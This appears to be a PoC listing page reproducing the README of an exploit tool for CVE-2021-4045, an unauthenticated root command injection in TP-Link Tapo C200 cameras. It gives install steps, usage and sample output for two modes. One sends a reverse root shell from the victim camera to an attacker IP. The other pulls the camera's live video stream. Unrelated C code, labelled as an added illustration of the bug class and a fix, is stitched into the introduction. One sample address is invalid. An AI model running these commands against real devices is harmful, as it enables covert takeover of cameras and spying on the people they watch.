
CVE-2021-4045 PoC — Tp-link Tapo C200 command injection vulnerability

Source
Related vulnerability
Title: Tp-link Tapo C200 command injection vulnerability (CVE-2021-4045)
Description: The Tp-link Tapo C200 is a network camera made by the Chinese company TP-Link. Firmware versions 1.1.15 and earlier of the Tp-link Tapo C200 camera contain a security vulnerability: the uhttpd binary runs as root by default and does not filter or escape command parameters. An unauthenticated attacker can exploit this with a specially crafted request to execute system commands on the device.
Description
🔐 "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" 🔓
Introduction
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)

This is a command injection vulnerability that affects all TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works, read this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce)
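As an added illustration (not the camera firmware's code and not part of this tool), a hypothetical uhttpd-style handler showing the bug class described above, a request parameter spliced into a shell command run as root, beside a hardened version that allowlists the value and spawns the helper without any shell. `/bin/setlang` and `/bin/echo` are stand-ins for whatever helper the real firmware calls.

```c
/* Added example, not firmware code: vulnerable command building vs. a
 * hardened handler. The parameter name and helper binaries are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <spawn.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* VULNERABLE pattern: the request value is interpolated into a command line
 * that system() would hand to /bin/sh, so ';', '|', '`', '$(' and quotes in
 * the value become additional commands running with uhttpd's root privileges.
 * The string is returned rather than executed so the effect can be inspected. */
int build_cmd_unsafe(const char *value, char *out, size_t outlen) {
    /* "/bin/setlang" is a hypothetical helper binary */
    return snprintf(out, outlen, "/bin/setlang %s", value) < (int)outlen;
}

/* Hardened step 1: strict allowlist on the shape of the value (length and
 * character set), rejecting every shell metacharacter outright. */
int value_is_safe(const char *value) {
    size_t n = strlen(value);
    if (n == 0 || n > 16) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!(isalnum(c) || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* Hardened step 2: no shell at all. The value travels as a single argv entry
 * through posix_spawn, so even if the allowlist were loosened later, nothing
 * parses it for metacharacters. Returns the child's exit status, or -1 when
 * the value is rejected or the spawn fails. */
int run_setlang_safe(const char *value) {
    if (!value_is_safe(value)) return -1;
    char *argv[] = { (char *)"/bin/echo", (char *)value, NULL }; /* echo stands in for the helper */
    pid_t pid;
    int status;
    if (posix_spawn(&pid, argv[0], NULL, NULL, argv, environ) != 0) return -1;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```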

## Installation
```shell
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes, SHELL and RTSP.

## SHELL
In the shell mode you only need to provide the victim IP, the attacker IP and the listening port; this will spawn a root shell on the device.
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RTSP
In the RTSP mode you'll need to provide the RTSP user, password and ciphertext to be able to get live footage from the camera.
```shell
python3 pwntapo.py -M rtsp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION
File snapshot

```
[4.0K] /data/pocs/6f64748cd9cd59609afd6320c32c56e511288eab
├── [4.2K] pwntapo.py
├── [4.2K] README.md
└── [  48] requirements.txt

0 directories, 3 files
```